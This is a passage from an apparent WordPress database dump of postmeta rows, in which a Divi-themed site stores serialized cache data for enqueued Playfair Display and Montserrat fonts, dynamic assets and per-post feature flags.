:{}}'),(34176,581,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34168,607,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34169,597,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34170,597,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34171,597,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34172,597,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34173,581,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34174,581,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34175,581,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34161,615,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34162,615,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34163,615,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34164,615,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34165,607,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34166,607,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34167,607,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34157,751,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34158,751,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34159,751,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34160,751,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34153,762,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34154,762,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34155,762,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34156,762,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34150,782,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34151,782,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34152,782,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34145,842,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34146,842,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34147,842,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34148,842,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34149,782,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34144,859,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34140,947,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34141,859,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34142,859,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34143,859,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34134,989,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34135,989,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34136,989,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34137,947,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34138,947,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34139,947,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34128,1111,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34129,1116,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34130,1116,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34131,1116,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34132,1116,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34133,989,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34124,1258,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34125,1111,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34126,1111,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34127,1111,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34123,1258,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gut